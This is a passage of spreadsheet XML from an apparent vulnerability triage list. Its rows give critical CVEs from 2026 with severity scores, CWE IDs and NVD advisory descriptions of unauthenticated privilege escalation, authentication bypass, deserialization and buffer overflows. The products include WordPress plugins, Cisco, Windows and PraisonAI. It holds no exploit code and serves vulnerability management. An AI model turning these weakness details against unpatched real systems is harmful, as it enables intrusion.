          <t>The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.6.2. This is due to the plugin not validating that a submitted form ID belongs to a JetFormBuilder form before parsing the referenced post's content as form schema and executing an Advanced Validation server-side callback. This makes it possible for unauthenticated attackers to create a new administrator-level user account.</t>
        </is>
      </c>
      <c r="S21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12793</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14349</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr"/>
      <c r="Q22" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>The TrueBooker – Appointment Booking and Scheduler System plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.2.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to modify the email address of arbitrary user accounts, including administrators, which can be leveraged to reset the account's password and gain access to it.</t>
        </is>
      </c>
      <c r="S22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14349</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20242</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr"/>
      <c r="Q23" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the External Database Access feature of Cisco Secure Firewall Management Center (FMC) Software could allow an unauthenticated, remote attacker to execute arbitrary commands as&amp;nbsp;root on an affected device.
This vulnerability is due to insecure deserialization of a user-supplied Java byte stream from a host that is configured in the external database access list. An attacker could exploit this vulnerability by sending a crafted, serialized Java byte stream to a specific TCP port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the device and elevate privileges to root.
Notes:
This vulnerability can be exploited only by an attacker who has control of a host in the external database access list.
If the FMC management interface does not have public internet access, the attack surface that is associated with this vulnerability is reduced.</t>
        </is>
      </c>
      <c r="S23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20242</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20326</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr"/>
      <c r="Q24" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Nexus Dashboard engineering team has conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20326 are related to missing authentication for critical function issues that are grouped under the Common Weakness Enumeration (CWE) CWE-306.</t>
        </is>
      </c>
      <c r="S24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20326</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27546</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can exploit an authentication bypass in the _account_log function to log in as an admin, even when accounts are properly configured.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27546</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27565</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can upload a malicious IODD file that places and executes a shell script with root privileges. The shell script remains active even after a reboot.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27565</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54334</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>UEFI Firmware Parser parses BIOS, Intel ME, and UEFI firmware structures including volumes, file systems, and files. Prior to 1.14, ReadCLen() in uefi_firmware/compression/Tiano/Decompress.c reads Number from GetBits(Sd, CBIT) with CBIT = 9 and can obtain 511 entries for the 510-element Sd-&gt;mCLen heap array because its loop does not enforce Index &lt; NC. The CharC == 2 run-length path can additionally request up to 531 zero writes through Sd-&gt;mCLen[Index++] = 0. The normal CompressedSection.process() to efi_compressor.TianoDecompress() to TianoDecompress() to DecodeC() to ReadCLen() parsing path therefore permits crafted Tiano or EFI compressed firmware to corrupt heap memory, deterministically crash the parsing process, and potentially execute code depending on build and runtime details. This issue is fixed in version 1.14.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54334</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57127</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-306</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.58, recipe serve installs APIKeyAuthMiddleware or JWTAuthMiddleware when an operator selects api-key or JWT authentication, but each middleware forwards requests when PRAISONAI_API_KEY or PRAISONAI_JWT_SECRET and the corresponding recipe value are absent. Unauthenticated clients can then reach recipe execution, input, and output surfaces and may trigger connected tools despite the operator explicitly enabling authentication. This issue is fixed in 4.6.58.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57127</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57131</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862, CWE-94</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.58, praisonai.jobs.server.create_app mounts praisonai.jobs.router.create_router under /api/v1/runs without authentication or per-job authorization. Network clients can submit attacker-controlled prompts and agent configuration, list and read jobs, stream results, and cancel or delete other jobs, exposing service credentials and connected tool capabilities to unauthorized agent execution. This vulnerability is fixed in 4.6.58.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57131</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57967</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated remote attacker can craft a CORE protocol SESSION_REATTACH packet to steal an existing session and assume ongoing execution of the previously authenticated session.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57967</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65414</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. A remote attacker may be able to cause unexpected app termination or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65414</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66302</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68839</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K33"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33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K34"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34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35"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35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36"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36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78573</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr">
        <is>
          <t>ibm:contextforge</t>
        </is>
      </c>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway 1.0.0 through 1.0.7 could allow a remote attacker to gain administrative access due to the use of default credentials.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78573</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79724</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
